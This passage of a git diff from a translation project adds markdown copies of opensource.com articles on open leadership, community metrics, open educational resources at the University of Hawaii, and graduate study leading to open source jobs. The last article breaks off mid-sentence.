+[57]:https://whytls.com/ +[58]:https://textslashplain.com/2016/09/22/use-https-for-all-inbound-links/ +[59]:https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html +[60]:https://www.safaribooksonline.com/library/view/the-oreilly-security/9781491960035/video287622.html +[61]:https://developer.chrome.com/devsummit/ +[62]:https://textslashplain.com/2016/ +[63]:https://blogs.msdn.microsoft.com/ieinternals/2013/10/16/strict-p3p-validation/ +[64]:https://textslashplain.com/2016/01/20/putting-users-first/ +[65]:https://chrome.google.com/webstore/detail/quick-tabs/jnjfeinjfmenlddahdjdmgpbokiacbbb +[66]:https://news.google.com/ +[67]:https://bayden.com/slickrun/ diff --git a/sources/talk/20170202 Why we need open leaders more than ever.md b/sources/talk/20170202 Why we need open leaders more than ever.md new file mode 100644 index 0000000000..9cdddc19f1 --- /dev/null +++ b/sources/talk/20170202 Why we need open leaders more than ever.md @@ -0,0 +1,83 @@ +GHLandy Translating + +Why we need open leaders more than ever +============================================================ + +### Changing social and cultural conditions are giving rise to open leadership. + +Posted 02 Feb 2017[Philip A Foster][10][Feed][9]13[up][6] + ![Why we need open leaders more than ever](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUSINESS_politics-1.png?itok=SmpUnH4c "Why we need open leaders more than ever") +>Image by : opensource.com + +Leadership is power. More specifically, leadership is the power to influence the actions of others. The mythology of leadership can certainly conjure images of not only the romantic but also the sinister side of the human condition. How we ultimately decide to engage in leadership determines its true nature. + +Many modern understandings of leadership are born out of warfare, where leadership is the skillful execution of command-and-control thinking. For most of the modern era of business, then, we engaged leadership as some great man or woman arriving at the pinnacle of power and exerting this power through position. Such traditional leadership relies heavily on formal lines of authority through hierarchies and reporting relationships. Authority in these structures flows down through the vertical hierarchy and exists along formal lines in the chain of command. + +>Open leaders quickly discover that leadership is not about the power we exert to influence progress, but the power and confidence we distribute among the members of the organization. + +However, in the late 20th century, something began to change. New technologies opened doors to globalism and thus more dispersed teams. The way we engaged human capital began to shift, forever changing the way people communicate with each other. People inside organizations began to feel empowered, and they demanded a sense of ownership of their successes (and failures). Leaders were no longer the sole owners of power. The 21st century leader leading the 21st century organization began to understand empowerment, collaboration, accountability, and clear communication were the essence of a new kind of power. These new leaders began _sharing_ that power—and they implicitly trusted their followers. + +As organizations continue becoming more open, even individuals without "leadership" titles feel empowered to drive change. These organizations remove the chains of hierarchy and untether workers to do their jobs in the ways they best see fit. History has exposed 20th century leaders' tendencies to strangle agility through unilateral decision-making and unidirectional information flows. But the new century's leader best defines an organization by the number of individuals it empowers to get something done. There's power in numbers—and, frankly, one leader cannot be in all places at all times, making all the decisions. + +So leaders are becoming open, too. + +### Control + +Where the leaders of old are focused on command-and-control positional power, an open leader cedes organizational control to others via new forms of organizational governance, new technologies, and other means of reducing friction, thereby enabling collective action in a more efficient manner. These leaders understand the power of trust, and believe followers will always show initiative, engagement, and independence. And this new brand of leadership requires a shift in tactics—from _telling people what to do_ to _showing them what to do_ and _coaching them along the way_. Open leaders quickly discover that leadership is not about the power we exert to influence progress, but the power and confidence we _distribute_ among the members of the organization. The 21stcentury leader is focused on community and the edification of others. In the end, the open leader is not focused on self but is selfless. + +### Communication + +The 20th century leader hordes and controls the flow of information throughout the organization. The open leader, however, seeks to engage an organization by sharing information and context (as well as authority) with members of a team. These leaders destroy fiefdoms, walk humbly, and share power like never before. The collective empowerment and engaged collaboration they inspire create agility, shared responsibility, ownership—and, above all, happiness. When members of an organization are empowered to do their jobs, they're happier (and thus more productive) than their hierarchical counterparts. + +### Trust + +Open leaders embrace uncertainty and trust their followers to do the right thing at the right time. They possess an ability to engage human capital at a higher level of efficiency than their traditional counterparts. Again: They don't operate as command-and-control micromanagers. Elevating transparency, they don't operate in hiding, and they do their best to keep decisions and actions out in the open, explaining the basis on which decisions get made and assuming employees have a high level grasp of situations within the organization. Open leaders operate from the premise that the organization's human capital is more than capable of achieving success without their constant intervention. + +### Autonomy + +Where the powerful command-and-control 20th century leader is focused on some _position_ of power, an open leader is more interested in the actual _role_ an individual plays within the organization. When a leader is focused on an _individual_, they're better able to coach and mentor members of a team. From this perspective, an open leader is focused on modeling behaviors and actions that are congruent with the organization's vision and mission. In the end, an open leader is very much seen as a member of the team rather than the _head_ of the team. This does not mean the leader abdicates a position of authority, but rather understates it in an effort to share power and empower individuals through autonomy to create results. + +### Empowerment + +Open leaders are focused on granting authority to members of an organization. This process acknowledges the skills, abilities, and trust the leader has in the organization's human capital, and thereby creates positive motivation and willingness for the entire team to take risks. Empowerment, in the end, is about helping followers believe in their own abilities. Followers who believe that they have personal power are more likely to undertake initiatives, set and achieve higher goals, and persist in the face of difficult circumstances. Ultimately the concept of an open organization is about inclusivity, where everyone belongs and individuality and differing opinions are essential to success. An open organization and its open leaders offer a sense of community, and members are motivated by the organization's mission or purpose. This creates a sense of belonging to something bigger than the individual. Individuality creates happiness and job satisfaction among its members. In turn, higher degrees of efficiency and success are achieved. + +>More Open Organization Resources + +* [Download the Open Organization Leaders Manual][1] +* [Download the Open Organization Field Guide][2] +* [What is an Open Organization?][3] +* [What is an Open Decision?][4] + +We should all strive for the openness the 21st century leader requires. This requires self-examination, curiosity—and, above all, it's ongoing process of change. Through new attitudes and habits, we move toward the discovery of what an open leader really _is _and _does,_ and hopefully we begin to take on those ideals as we adapt our leadership styles to the 21st century. + +Yes, leadership is power. How we use that power determines the success or failure of our organizations. Those who abuse power don't last, but those who share power and celebrate others do. By reading [this book][7], you are beginning to play an important role in the ongoing conversation of the open organization and its leadership. And at the conclusion of [this volume][8], you'll find additional resources and opportunities to connect with the open organization community, so that you too can chat, think, and grow with us. Welcome to the conversation—welcome to the journey! + +_This article originally appeared as the introduction to _The Open Organization Leaders Manual_, now [available from Opensource.com][5]._ + +-------------------------------------------------------------------------------- + +译者简介: + +Philip A Foster - Dr. Philip A. Foster is a leadership/business coach and consultant and Adjunct Professor. He is a noted Thought Leader in Business Operations, Organizational Development, Foresight and Strategic Leadership. Dr. Foster facilitates change through the design and implementation of strategies, strategic foresight, and planning. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/2/need-open-leaders-more-ever + +作者:[Philip A Foster][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/maximumchange +[1]:https://opensource.com/open-organization/resources/leaders-manual?src=too_resource_menu +[2]:https://opensource.com/open-organization/resources/field-guide?src=too_resource_menu +[3]:https://opensource.com/open-organization/resources/open-org-definition?src=too_resource_menu +[4]:https://opensource.com/open-organization/resources/open-decision-framework?src=too_resource_menu +[5]:https://opensource.com/open-organization/resources/leaders-manual +[6]:https://opensource.com/open-organization/17/2/need-open-leaders-more-ever?rate=c_9hT0EKbdXcTGRl-YW0QgW60NsRwO2a4RaplUKfvXs +[7]:https://opensource.com/open-organization/resources/leaders-manual +[8]:https://opensource.com/open-organization/resources/leaders-manual +[9]:https://opensource.com/user/15497/feed +[10]:https://opensource.com/users/maximumchange diff --git a/sources/talk/20170203 4 questions to answer when choosing community metrics to measure.md b/sources/talk/20170203 4 questions to answer when choosing community metrics to measure.md new file mode 100644 index 0000000000..4d17a44738 --- /dev/null +++ b/sources/talk/20170203 4 questions to answer when choosing community metrics to measure.md @@ -0,0 +1,93 @@ +4 questions to answer when choosing community metrics to measure +============================================================ + +> When evaluating a specific metric that you are considering including in your metrics plan, you should answer four questions. + + + ![4 questions to answer when choosing community metrics to measure](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/metrics_lead-steps-measure.png?itok=dj9mvlQw "4 questions to answer when choosing community metrics to measure") +Image by :  + +[Internet Archive Book Images][4]. Modified by Opensource.com. [CC BY-SA 4.0][5] + +Thus far in the [Community Metrics Playbook][6] column, I've discussed the importance of [setting goals][7] to guide the metrics process, outlined the general [types of metrics][8] that are useful for studying your community, and reviewed technical details of [available tools][9]. As you are deciding which metrics to track for your community, having a deeper understanding of each area is important so you not only choose good metrics, but also understand and plan for what to do when the numbers don't line up with expectations. + +When evaluating a specific metric that you are thinking about including in your metrics plan, you should answer four questions: + +* Does it help achieve my goals? +* How accurate is it? +* What is its relationship to other metrics? +* What will I do if the metrics goes "bad"? + +### Goal-appropriate + +This one should be obvious by now from my [previous discussion on goals][10]: Why do you need to know this metric? Does this metric have a relationship to your project's goals? If not, then you should consider ignoring it—or at least placing much less emphasis on it. Metrics that do not help measure your progress toward goals waste time and resources that could be better spent developing better metrics. + +One thing to consider are intermediate metrics. These are metrics that may not have an obvious, direct relationship to your goals. They can be dangerous when considered alone and can lead to undesirable behavior simply to "meet the number," but when combined with and interpreted in the context of other intermediates, can help projects improve. + +### Accuracy + +Accuracy is defined as the quality or state of being correct or precise. Gauging accuracy for metrics that have built-in subjectivity and bias, such as survey questions, is difficult, so for this discussion I'll talk about objective metrics obtained by computers, which are for the most part highly precise and accurate. [Data can't lie][11], so why are we even discussing accuracy of computed metrics? The potential for inaccurate metrics stems from their human interpretation. The classic example here is _number of downloads_. This metric can be measured easily—often as part of a download site's built-in metrics—but will not be accurate if your software is split into multiple packages, or known systemic processes produce artificially inflated (or deflated) numbers, such as automated testing systems that execute repeated downloads. + +As long as you recognize and avoid fixating on absolute correctness, having slightly inaccurate metrics is usually better than no metrics at all. Web analytics are [notorious][12] for being inaccurate gauges of reality due to the underlying technical nature of web servers, browsers, proxies, caching, dynamic addressing, cookies, and other aspects of computing that can muddy the waters of visitor engagement metrics; however, multiple slightly inaccurate web metrics over time can be an accurate indicator that the website refresh you did reduced your repeat visits by 30%. So don't be afraid of the fact that you'll probably never achieve 100% accuracy. + +### Understanding relationships + + ![fresh lemons graph](https://opensource.com/sites/default/files/f1-falkner-02-2017_520.png "fresh lemons graph") + +_Data from: [NHTSA, DOT HS 810 780][1]. [U.S. Department of Agriculture (pdf)][2]_ + +The universe of metrics is full of examples stemming from the statistical phrase "[correlation does not imply causation][13]." When choosing metrics, carefully consider whether the chosen metric might have relationships to other metrics, directly or indirectly. Related metrics often can help diagnose success and failure, and indicate needed changes to your project to drive the improvement you're looking for. + +Truly proving that one metric's behavior causes predictable changes in another requires quite a bit of experimentation and statistical analysis, but you don't have to take it that far. If you suspect a relationship, take note and observe their behavior over time, and if evidence suggests a relationship, then you can do experimentation in your own project to test the hypothesis. + +For example, a typical goal of open source projects is to drive innovation by attracting new developers who bring their diverse experience and backgrounds to the project. A given project notices that when the "average time from contribution to code commit" decreases, the number of new contributors coming to the project increases. If evidence over time maintains this correlation, the project might decide to dedicate more resources to handling contributions. This can have an effect elsewhere—such as an increase in bugs due to lots of new code coming in—so try not to over-rotate while using your new-found knowledge. + +### Planning for failure + +After gauging the accuracy and applicability of a metric, you need to think about and plan for what you will do when things don't go as planned (which will happen). Consider this scenario: You've chosen several quality-related metrics for your project, and there is general agreement that they are accurate and important to the project. The QA team is working hard, yet your chosen metrics continue to suffer. What do you do? You have several choices: + +* Do nothing. +* Make the QA team come in on the weekend to write more tests. +* Work with developers to find the root cause of all the bugs. +* Choose different metrics. + +Which is the correct choice? The answer shouldn't surprise you: _It depends_. You may not need to do anything if the trend is expected, for example if resource constraints are forcing you to trade quality for some other metric. QA might actually need to write more tests if you have known poor coverage. Or you may need to do root cause analysis for a systemic issue in development. The last one is particularly important to include in any plan; your metrics may have become outdated and no longer align with your project's goals, and should be regularly evaluated and eliminated or replaced as needed. + +Rarely will there be a single correct choice—it's more important to outline, for each metric, the potential causes for failure and which questions you need to ask and what you will do in various contexts. It doesn't have to be a lengthy checklist of actions for each possible cause, but you should at least list a handful of potential causes and how to proceed to investigate failure. + +By answering these four questions about your metrics, you will gain a greater understanding of their purpose and efficacy. More importantly, sharing the answers with the rest of the project will give your community members a greater feeling of autonomy and purpose, which can be a much better motivator than simply asking them to meet a set of seemingly arbitrary numbers. + +-------------------------------------------------------------------------------- + +译者简介: + +James Falkner - Technology evangelist, teacher, learner, author, dedicated to open source and open computing. I work at Red Hat as a technical evangelist for Red Hat's portfolio of open source products and love what we do and learning from others, and occasionally teaching at conferences. + +Prior to Red Hat I spent 5 years at Liferay growing a large open source community, onboarding new contributors, meeting and engaging with beginners and experts, and championing open source as the de facto choice for businesses large and small. I am based in the Orlando, Florida, USA area. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/4-questions-answer-when-choosing-community-metrics-measure + +作者:[James Falkner][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/james-falkner +[1]:https://crashstats.nhtsa.dot.gov/Api/Public/ViewPublication/810780 +[2]:http://www.ers.usda.gov/media/320480/wrs0406f_1_.pdf +[3]:https://opensource.com/article/17/2/4-questions-answer-when-choosing-community-metrics-measure?rate=I8iVb2WNG2xAcYFvNaZfoEFTozgl_gQ-Pz8Ra1SveOE +[4]:https://www.flickr.com/photos/internetarchivebookimages/14753212581/in/photolist-otG57a-orWcFN-ovJbD4-orWgoN-otWQTN-otWmY9-otG3wg-otYjFc-otLxay-otWi5N-ovJ8pt-ocuoJr-otG4KZ-ovJ7ok-otWjdj-otY18v-otYqxn-orWptL-otWkzY-otWTnW-otYcHe-otWAx3-octWmY-otWNwd-otL2wq-otYco6-ovHSva-otFSq4-otFPP2-otWmAL-otYtwP-orWAj3-otLjQy-otWDRs-otWoPJ-otG7wR-otWBTQ-otG4b2-otWyD3-orWgCA-otWMzo-otYfHx-otY9oP-otGbrz-orWnwj-orW6gJ-ocuAd8-orW5U1-otWBcu-otFXgr/ +[5]:https://creativecommons.org/licenses/by-sa/4.0/ +[6]:https://opensource.com/tags/community-metrics-playbook +[7]:https://opensource.com/bus/16/8/measuring-community-health +[8]:https://opensource.com/business/16/9/choosing-right-metrics +[9]:https://opensource.com/article/16/11/tools-collecting-analyzing-community-metrics +[10]:https://opensource.com/bus/16/8/measuring-community-health +[11]:http://management.curiouscatblog.net/2007/08/09/data-cant-lie/ +[12]:https://brianclifton.com/pro-lounge-files/accuracy-whitepaper.pdf +[13]:https://en.wikipedia.org/wiki/Correlation_does_not_imply_causation +[14]:https://opensource.com/user/18065/feed +[15]:https://opensource.com/users/james-falkner diff --git a/sources/talk/20170203 How the University of Hawaii is solving todays higher ed problems.md b/sources/talk/20170203 How the University of Hawaii is solving todays higher ed problems.md new file mode 100644 index 0000000000..e94c16b21f --- /dev/null +++ b/sources/talk/20170203 How the University of Hawaii is solving todays higher ed problems.md @@ -0,0 +1,94 @@ +How the University of Hawaii is solving today's higher ed problems +============================================================ + + ![How the University of Hawaii is solving today's higher ed problems](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BUS_brainstorm_island_520px.png?itok=KRXqz2-m "How the University of Hawaii is solving today's higher ed problems") +>Image by : opensource.com + +Openness invites greater participation and it takes advantage of the shared energy of collaborators. The strength of openly created educational resources comes paradoxically from the vulnerability of the shared experience of that creation process. + +One of the leaders in Open Educational Resources (OER) is [Billy Meinke][3], educational technologist at the University of Hawaii at Manoa. The University's open creation model uses [Pressbooks][4], which Billy tells me more about in this interview. + +**Don Watkins (DW): How did your work at Creative Commons lead you to the University of Hawaii?** + +**Billy Meinke (BM)**: Well, I've actually _returned_ to The University of Hawaii (UH) after being in the Bay Area for several years. I completed the ETEC educational technology Master's program here and then moved to San Francisco where I worked with [Creative Commons][5] (CC). Being with CC was a rewarding and eye-opening experience, and I'm hopeful that what I learned out there will lend itself to the OER work we are ramping up at the University. + +**DW: What came first: instructional design or OER? Are the two symbiotic?** + +**BM**: To me, OER is just a better flavor of learning content. Instructional designers make lots of decisions about the learning product they want to create, be it a textbook or a course or a piece of media. But will they put an open license on that OER when it's published? Will they use an open source tool to author the content? Will they release it in an open format? An instructional designer can produce effective learning content without doing any of those things, but it won't be as useful to the next person. OERs are different because they are designed for reuse, regardless of pedagogical strategy or learning approach. + +**DW: How long has the University of Hawaii been using OERs? What were the primary motivations?** + +**BM**: The OER effort at UH started in 2014, and this past November I took over management of OER activities at UH Manoa, the University system's flagship campus. + +The UH system has a healthy group of OER advocates throughout, primarily at the community colleges. They've transitioned hundreds of courses to become textbook zero (textbooks at no cost) and have made lots of headway building OER-based courses for two-year students. I've been really impressed with how well they've moved towards OER and how much money they've saved students over the last few semesters. We want to empower faculty to take control of what content they teach with, which we expect will result in their saving students money, at all of our campuses. + +**DW: What are Pressbooks? Why are Pressbooks important to the creation of OERs?** + +**BM**: Members of the faculty do have a choice in terms of what content they teach from, much of the time. Some write their own content, or maintain websites that house a course. Pressbooks is a WordPress-based publishing platform that makes it simpler to manage the content—like a book, with sections and chapters, a table of contents, author and publisher metadata, and the capability of to export the "book" into formats that can be easily read _and_ reused. + +Because most undergraduate courses still rely on a primary textbook, we're opening up a means for faculty to adopt an existing open textbook or to co-author a text with others. Pressbooks is the tool, and we're developing the processes for adapting OER as we go. + +**DW: How can a person get involved in development of Pressbooks?** + +**BM**: Pressbooks has a [GitHub repository][6] where they collaboratively build the supporting software, and I've lurked on it for the last year or so. It can take some getting used to, but the conversations that happen there reveal the direction of the software and give an idea of who is working on what. Pressbooks does offer the free hosting of a limited version of the software (it includes a watermark to encourage folks to upgrade) for those who want to tinker without too much commitment. Also, the software is openly licensed (GPLv2), so anyone can use the code without cost or permission. + +**DW: What other institutions use Pressbooks?** + +**BM**: Some of the more widely known examples are [SUNY's Open Textbook project][7] and the [BCcampus OpenEd project][8]. [Lumen Learning][9] also has its own version of Pressbooks, as does [Open Oregon State][10]. + +We're looking at what all of these folks are doing to see where we can take our use of Pressbooks, and we hope to help pave the way for others who are developing their own OERs. In some cases, Pressbooks is being used to support entire courses and has integrated activities and assessments, which can hook into the Learning Management System (LMS) an institution uses for course delivery. + +Because Pressbooks is powered by WordPress, it actually has quite a bit of flexibility in terms of what it can do, but we're setting up a humble roadmap for now. We'll be doing standalone open textbooks first. + +**DW: How can other colleges and universities replicate your success? What are some first steps?** + +**BM**: Forming a community that includes librarians, instructional designers, and faculty seems to be a healthy approach. The very first step will always be to get a handle on what is happening with OERs currently where you are, who is aware (or knowledgeable) about OERs, and then supporting them. My focus now is on curating the training resources around OERs that our team has developed, and helping the faculty gain the knowledge and skills it needs to begin adapting OERs. We'll be supporting a number of open textbook adoptions and creations this year, and it's my opinion that we should support folks with OERs, but then get out of the way when they're ready to take to the sky. + +**DW: How important is "release early, release often?"** + +**BM**: Even though the saying has been traditionally used to describe open practices for developing software, I think the creators of OER content should work toward embracing it, too. All too often, an open license is placed on a piece of OER as a finishing step, and none of the drafts or working documents are ever shared before the final content is released. Many folks don't consider that there might be much to gain by publishing early, especially when working independently on OER or as part of the small team. Taking a page from Mozilla's Matt Thompson, [working openly][11] makes way for greater participation, agility, momentum, iteration, and leveraging the collective energy of folks who have similar goals to your own. Because my role at UH is to connect and facilitate the adoption and creation of OER, releasing drafts of planning documents and OER as I go makes more sense. + +To take advantage of the collective experience and knowledge that my networks have, I must improve the quality of the work continuously. This may be the most unsettling part of working openly—others can see your flaws and mistakes alongside your successes and wins. But in truth, I don't think many folks go around looking for issues with the work of others. More often, their assessment begins with asking (after watching and lurking) how useful the work of others is to their own work, which isn't always the case. If it seems useful on the surface, they'll take a deeper look, but they'll otherwise move on to find the good work of others that can help them go further with their own project. + +Being able to borrow ideas from and in some cases directly use the planning docs of others can help new OER projects find legs. That's part of my strategy with the UH system as well: sharing what works so that we can carry our OER initiative forward, together. + +**DW: How is the Open Foundation's approach for ****[OERu][1] ****of select, design, develop, deliver, and revise similar to **[**David Wiley's 5Rs**][12]**?** + +**BM**: Well, OERu's development workflow for OER courses is designed to outline the process of creating and revising OER, while Wiley's 5Rs framework is an assessment tool for an OER. You would (as we have) use OERu's workflow to understand how you can contribute to their course development. Wiley's 5Rs is more of a set of questions to ask to understand how open an OER is. + +**DW: Why are these frameworks essential to the development cycle of OERs and do you have your own framework?** + +**BM**: While I don't believe that any framework or guide is a magic bullet or something that will guarantee success in developing OERs, I think that opening up the processes of content development can benefit teams and individuals who are taking on the challenge of adopting or creating OERs. At a minimum, a framework, or a set of them, can give a big-picture view of what it takes to produce OERs from start to finish. With tools like these, they may better understand where they are in their own process, and have an idea of what it will take to reach the end points they have set for their OER work. + +-------------------------------------------------------------------------------- + +译者简介: + +Don Watkins - Educator, education technology specialist, entrepreneur, open source advocate. M.A. in Educational Psychology, MSED in Educational Leadership, Linux system administrator, CCNA, virtualization using Virtual Box. Follow me at @Don_Watkins . + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/2/interview-education-billy-meinke + +作者:[Don Watkins][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/don-watkins +[1]:https://oeru.org/ +[2]:https://opensource.com/article/17/2/interview-education-billy-meinke?rate=MTzLUGkz2UyQtAenC-MVjynw2M_qBr_X4B-vE-0KCVI +[3]:https://www.linkedin.com/in/billymeinke +[4]:https://pressbooks.com/ +[5]:https://creativecommons.org/ +[6]:https://github.com/pressbooks/pressbooks +[7]:http://textbooks.opensuny.org/ +[8]:https://open.bccampus.ca/ +[9]:http://lumenlearning.com/ +[10]:http://open.oregonstate.edu/textbooks/ +[11]:https://openmatt.org/2011/04/06/how-to-work-open/ +[12]:https://opencontent.org/blog/archives/3221 +[13]:https://opensource.com/user/15542/feed +[14]:https://opensource.com/article/17/2/interview-education-billy-meinke#comments +[15]:https://opensource.com/users/don-watkins diff --git a/sources/talk/20170206 A graduate degree could springboard you into an open source job.md b/sources/talk/20170206 A graduate degree could springboard you into an open source job.md new file mode 100644 index 0000000000..e7942f13d9 --- /dev/null +++ b/sources/talk/20170206 A graduate degree could springboard you into an open source job.md @@ -0,0 +1,117 @@ +A graduate degree could springboard you into an open source job +============================================================ + + + ![A graduate degree could springboard you into an open source job](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/rh_003784_02_os.comcareers_os_rh2x.png?itok=4wXjYMBw "A graduate degree could springboard you into an open source job") +Image by :  + +opensource.com + +Tech companies often prefer [hiring those who have open source experience][2] because quite simply open source experience is more valuable. This preference is only growing stronger now that open source software dominates the industry and free and open source hardware is gaining momentum. For example, a [Indeed.com salary analysis][3] shows that jobs with the keywords "Microsoft Windows" have an average salary of $64,000, while jobs with the keyword "Linux" have an average salary of $99,000\. Enough said.  + +There are many good open source jobs available to those with Bachelor's degrees, but if you want to control your destiny, a higher degree will give you the freedom to be paid more for following your interests. + +This was very important to me when deciding what education I would choose, and I think it is true of most other PhDs. However, even if you do not put much stock in intellectual freedom, there is a pretty easy case to be made for "doing it for the Benjamins." + +If you care about economic security, as an undergraduate you should consider graduate school. According to [data from the U.S. Bureau of Labor Statistics'][4] Current Population Survey, your average income is going to go up by over 20% if you get a Master's degree and by about 50% if you get a PhD. Similarly the unemployment rate for those with a Bachelor's degree was about 5%, drops to 3.6% for a Master's degree and is cut in half to 2.5% for those with a PhD. + +Of course, all graduate programs and schools are _not_ equal. Most open source advocates would likely find themselves in some kind of engineering program. This is actually also pretty good news on the money front. [IEEE's Where the Jobs Are 2014][5] report says that engineering unemployment is just 1.9% and down to pre-recession levels. Similarly a [survey][6] by the American Society of Mechanical Engineers (ASME) and the American Society of Civil Engineers (ASCE) found that during the recession (from 2011 to 2013) the average salary for engineers actually rose almost 5%. + +Ironically, many students do not consider graduate school for economic reasons. On its face, grad school appears expensive and working your way through it without shouldering a lot of debt seems impossible. For example, [MIT is $24,000 per term][7], and this does not even include room and board. Even at my more humble university graduate school (Michigan Tech, located in the [snow-blasted][8] upper peninsula of Michigan) will set you back more than [$40,000 a year][9] to be an electrical or computer engineer. Despite these costs, graduate school in technical disciplines almost always has an exceptionally high return on investment. + +Also, I have even more good news: **If you are a solid student, graduate school will be more than free.** + +In general, the best students are offered research assistantships that pay their way through graduate school completely, even at the nation's top schools. PhD and Master's degree students are generally fully funded, including tuition and monthly stipends. You will not get rich, but your ramen noodles will be covered. The real beauty of this path is that in general the research that you are paid for will go directly to your own thesis. + +If you are looking for a graduate degree that will springboard you into an open source job, simply any graduate program will not do. A place to start is with the [top 100 universities][10] to support FOSS. + +There are also many institutions that have a fairly well-developed open source culture. Students at RIT can now [earn a minor in free and open source software][11] and free culture, and at Michigan Tech you can join the [Open Hardware Enterprise][12], which is essentially a student-run business. The Massachusetts Institute of Technology hosts [OpenCourseware][13], an open source approach to educational materials. However, be aware that although an academic pedigree is important it is not the primary concern. This is because in graduate school (and particularly for funding) you are applying to a research group (i.e., a single professor) in addition to applying to the university and program. + +### How to get a job in an open source lab + +While many academics ascribe to open source principles and many schools are supportive of open source overall, the group of hard core open source lab groups is fairly selective. NetworkWorld offers [six examples][14], Wikipedia keeps an incomplete [list][15], and I maintain a list of contributors to open source hardware for science on [Appropedia][16]. There are many more to choose from (for example, anyone who attends the open science conferences, [GOSH][17], etc.). + +I run one of these labs myself, and I hope to offer some insight into the process of acquiring funding for potential graduate students. My group studies solar cells and open hardware. [Solar photovoltaic technology represents one of the fastest growing industries][18] and the [open source hardware movement][19] (particularly [RepRap][20] 3D printers) is exploding. Because my lab, the Michigan Tech Open Sustainability Technology ([MOST][21]) Lab, is on the cutting edge of two popular fields, entrance into the group is extremely competitive. This is generally the case with most other open source research groups, which I am happy to report are increasing in both size and overall density within the academic community. + +There are two routes you can take to getting a job in an open source lab: 1) the direct route and 2) the indirect route. + +First, the direct route. + +### Make personal contact and stand out + +Applying to an open source academic lab usually starts with emailing the professor who runs the lab directly. To start, make sure your email is actually addressed to the professor by name and catches his or her interest in the subject and first line. This is necessary because, in general, professors want students working in their labs who share an interest in their research areas. They do not simply want to hire someone that is looking for a job. There are thousands of students looking for positions, so professors can be fairly picky about their selections. You need to prove your interest. Professors literally get dozens of email applications a week, so you must make sure you stand out. + +### Get good grades and study for the GREs + +In addition, you need to cover all the obvious bases. You are going to be judged first by your numbers. You must maintain high grades and get good GRE scores. Even if you are an awesome person, if you do not have scores and grades high enough to impress, you will not meet the minimum requirements for the graduate program and not even make the list for research assistantships. For my lab, competitive graduate students need to be in the top 10% in grades and test scores (GRE ninetieth percentile scores are above 162 for verbal, 164 for quantitative, and 5 or higher in analytical writing. International students will need TOEFL scores greater than 100 and IELTS scores greater than 7.5). + +You can find less competitive groups, but grades and scores will largely determine your chances, particularly the GRE if you are coming from outside the country. There are simply too many universities throughout the world to allow for the evaluation of the quality of a particular grade in a particular school in a particular class. Thus, and I realize this is absurdly reductionist, the practicalities of graduate school admission mean that the GRE becomes a way of quickly vetting students. Realize, however, that you can study for the GRE to improve your scores. Some international students are known for taking a year off to study and then knocking out perfect scores. You do not need to take it that far because the nature of U.S. funding favors domestic students over international students, but you should study hard for the tests. + +Even if your scores are not perfect, you can raise your chances considerably by proving your research interests. This is where the open source philosophy really pays some dividends. Unlike peers who intern at a proprietary company and can say generally, but not specifically, what they worked on, if you work in open source, a professor can see and vet your contributions to a project directly. Ideal applicants have a history and a portfolio already built up in the areas of the research group or closely related areas. + +### Show and share your work + +To gain entrance to my research group, and those like it, we really want to see your work. This means you should make some sort of personal webpage and load it up with your successful projects. You should have undertaken some major project in the research area you want to join. For my group it might be publishing a paper in a peer-reviewed journal as an undergrad, developing a new [open scientific method][22], or making valuable contributions to a large FOSS project, such as [Debian][23]. The project may be applied; for example, it could be in an applied sustainability project, such as organized [Engineers Without Borders][24] chapters at your school, or open hardware, such as founding a [hackerspace][25]. + +However, not all of your accomplishments need to be huge or need to be academic undergraduate research. If you restored a car, I want to know about it. If you have designed a cool video game, I want to play it. If you made a mod on the RepRap that I 3D print with or were a major developer of FOSS our group uses, I can more or less guarantee you a position if I have one. + +If you are a good student you will be accepted into many graduate programs, but if funding is low you may not be offered a research assistantship immediately. Do not take rejection personally. You might be the perfect student for a whole range of research projects and a professor may really want you, but simply may not have the funding when you apply. Unfortunately, there have been a stream of pretty vicious [cutbacks to academia in the U.S.][26] in recent years, so research assistantships are not as numerous as they once were. You should apply to several programs and to many professors because you never know who is going to have funding that is matched up to your graduate school career. + +This brings us to the second path to getting a good job in an open source graduate lab, the indirect one. + +### Sneak in + +The first step for this approach is ensuring you meet the minimum requirements for the particular graduate school and apply. These requirements tend to be much lower than advertised by an open source lab director. Once you are accepted to a university you can be placed in the teaching assistant (TA) pool. This also is a way to pay for graduate school, although it lacks the benefit of being paid to work on your thesis, which you will have to do on your own time. While you are establishing yourself at the university by getting good grades and being a good TA, you can attempt to volunteer in the open source lab of your choosing. Most professors with capacity in their lab will take on such self-funded students. If there really is no money, often the professor will offer you some form of independent study credits for your work. These can be used to reduce your class load, giving you time to do research. Take these credits, work hard, and prove yourself. + +This gets your foot is in the door. Your chances at pulling a research assistantship will skyrocket at this point. In general professors are always applying for funding that is randomly being awarded. Often professors must fill a research position in a short amount of time when this happens. If you are good and physically there, your chances are much better for winning those funds. Even in the worst-case scenario, in which you are able to work in an open source lab, but funding does not come, again the nature of open source research will help you. Your projects will be more easily accessible by other professors (who may have funding) and all of your research (even if only paid hourly) will be disclosed to the public. This is a major benefit that is lost to all of those working on proprietary or secret military-related projects. If your work is good, access to your technical work can help you land a position at another group, a program, a school (for example, as a Master's student applying to a PhD program elsewhere), or a better higher-paying job. + +**Work hard and share your research aggressively following the open source model and it will pay off.** + +Good luck! + +-------------------------------------------------------------------------------- + +译者简介: + +Joshua Pearce - Dr. Joshua Pearce is cross appointed as an Associate Professor in the Materials Science & Engineering and the Electrical & Computer Engineering at Michigan Tech. He currently runs the Michigan Tech in Open Sustainability Technology (MOST) 